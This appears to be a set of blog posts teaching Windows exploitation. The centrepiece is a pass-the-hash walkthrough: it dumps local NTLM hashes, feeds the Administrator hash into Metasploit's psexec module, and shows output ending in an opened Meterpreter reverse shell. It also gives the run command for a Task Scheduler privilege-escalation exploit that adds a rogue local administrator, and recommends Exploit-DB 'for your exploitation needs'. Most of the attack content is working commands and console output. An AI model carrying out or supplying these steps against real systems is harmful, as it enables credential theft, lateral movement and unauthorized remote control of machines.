Get your mind out of the gutter you hippies.  This is an exploitation technique.

So, let’s assume you used one of the previous local exploits and elevated your effective permissions.  If you’re looking to exploit other machines on the network, an old common exploit practice is to dump the local password hashes and run them through John the Ripper, L0phtcrack, or Rainbow Tables to crack the password.  If you can get the password for the local Administrator account on one machine, you can usually use that password to exploit other machines on the network.  Although, if the password is complex enough or LM hashes aren’t even used, it can take a considerable amount of time to actually crack the password, which is where “passing the hash” comes in.

There is an excellent White Paper from SANS that goes much deeper into the subject than I can here.  The gist of the technique is that instead of going through the extensive process of cracking the password, you can simply pass the clear text hash to the remote machine for authentication.  The easiest tool I’ve found to utilize this technique is the PSEXEC module within Metasploit.  Let’s have a quick demonstration.

First, we use PWDUMP7 to dump the local password hashes.  There is also a “hashdump” utility built into Metasploit, but we’re working locally here, so maybe we can cover that later.  Here is the resulting hash dump:

Administrator:500:NO PASSWORD*********************:8846F7EAEE8FB117AD06BDD830B7586C:::
ASPNET:1006:0252CBAB72B4492F13D74481B172E825:B3236BC498A33A3CA9B3D4C8E48D3373:::
Guest:501:NO PASSWORD*********************:NO PASSWORD*********************:::
HelpAssistant:1000:107ECC6AB4CB35CFF2F678D9BC377703:B45E9E043A3889F9677F14CB7B2F54B9:::
IUSR_BUDLITE:1004:01C2F26EC4009168A67DFDCFBD090BB0:54D4FFC14D3C6460EEFD7A8194033430:::
IWAM_BUDLITE:1005:379388EA83410A09DC58A39F55298A65:6DEAD04C4D643F7FAF3AEAAA16D68D7F:::
SUPPORT_388945a0:1002:NO PASSWORD*********************:A8DAF152C2B78D9724CECC070C06E407:::

Notice that the Administrator has the entry “NO PASSWORD*********************”.  This simply means that the LM hash is not available and we must replace the string with 32 zeros to utilize it.

Next, we fire up Metasploit and configure the password parameter for the PSEXEC module with the hash that we dumped.

msf > search psexec
[*] Searching loaded modules for pattern 'psexec'...

Exploits
========

 Name                   Disclosure Date  Rank       Description
 ----                   ---------------  ----       -----------
 windows/smb/psexec     1999-01-01       manual     Microsoft Windows Authenticated User Code Execution
 windows/smb/smb_relay  2001-03-31       excellent  Microsoft Windows SMB Relay Code Execution

msf > use windows/smb/psexec
msf exploit(psexec) > show options

Module options:

 Name       Current Setting  Required  Description
 ----       ---------------  --------  -----------
 RHOST                       yes       The target address
 RPORT      445              yes       Set the SMB service port
 SMBDomain  WORKGROUP        no        The Windows domain to use for authentication
 SMBPass                     no        The password for the specified username
 SMBUser                     no        The username to authenticate as

Exploit target:

 Id  Name
 --  ----
 0   Automatic

msf exploit(psexec) > set RHOST 192.168.0.201
RHOST => 192.168.0.201
msf exploit(psexec) > set SMBUser Administrator
SMBUser => Administrator
msf exploit(psexec) > set SMBPass 00000000000000000000000000000000:8846F7EAEE8FB117AD06BDD830B7586C
SMBPass => 00000000000000000000000000000000:8846F7EAEE8FB117AD06BDD830B7586C
msf exploit(psexec) > exploit

[*] Started reverse handler on 192.168.0.147:4444
[*] Connecting to the server...
[*] Authenticating to 192.168.0.201:445|WORKGROUP as user 'Administrator'...
[*] Uploading payload...
[*] Created \PXmhNDSB.exe...
[*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.0.201[\svcctl] ...
[*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.0.201[\svcctl] ...
[*] Obtaining a service manager handle...
[*] Creating a new service (vzchEyYr - "MFlhSviwvJVrxoiou")...
[*] Closing service handle...
[*] Opening service...
[*] Starting the service...
[*] Removing the service...
[*] Closing service handle...
[*] Sending stage (749056 bytes) to 192.168.0.201
[*] Deleting \PXmhNDSB.exe...
[*] Meterpreter session 1 opened (192.168.0.147:4444 -> 192.168.0.201:1085) at Fri Dec 31 15:57:45 -0500 2010

meterpreter >

And there we have our wonderful Meterpreter session, without even knowing what the actual Administrator password is.  Since this is our first introduction to Metasploit, I have to point you to Metasploit Unleased, which is maintained by the guys at Offensive Security and is an invaluable resource to learn many of the capabilities of the tool.  Check it out!

This week I’m going to point you to an excellent Defcon 2010 talk given by Cesar Cerrudo from Argeniss, called Token Kidnapping’s Revenge.

Cesar goes through a deep explanation of how he used simple tools like Process Monitor and Process Explorer to find services that spawn multiple threads with impersonation permissions.  He used that information by enabling the debugging function of the service and opening a named pipe back to the local host running as the System account.  It’s a very interesting talk if you have the time to listen to it completely.

The exploit code is hosted on Exploit-DB.

The vulnerability was patched by Microsoft in MS10-059.

I figure that my first post will be about local privilege escalation.  It sounds like a good place to start.  So where do we go first to find a current local exploit?  The wonderful Exploit-DB, maintained by Offensive Security.

The top exploit as of today was written by webDEViL and exploits Windows Task Scheduler:

http://www.exploit-db.com/exploits/15589/

Just copy the text to a file with a “wsf” extension and run it using cscript:

c:\cscript.exe exploit.wsf

As written, the script creates a user “test123” with the password “test123” in the local Administrators group.  Easy huh?

The vulnerability is still currently under CVE review at CVE-2010-3888.  It was identified by Kaspersky Labs and other researchers and was apparently found in the wild being used by the Stuxnet Virus that was found in July of this year.

So, what’s the takeaway from this post?  Exploit-DB is the first place to go for your exploitation needs.

This exploit was recently added to Metasploit and cleverly named Schelevator.  The vulnerability was also patched by Microsoft in MS10-092.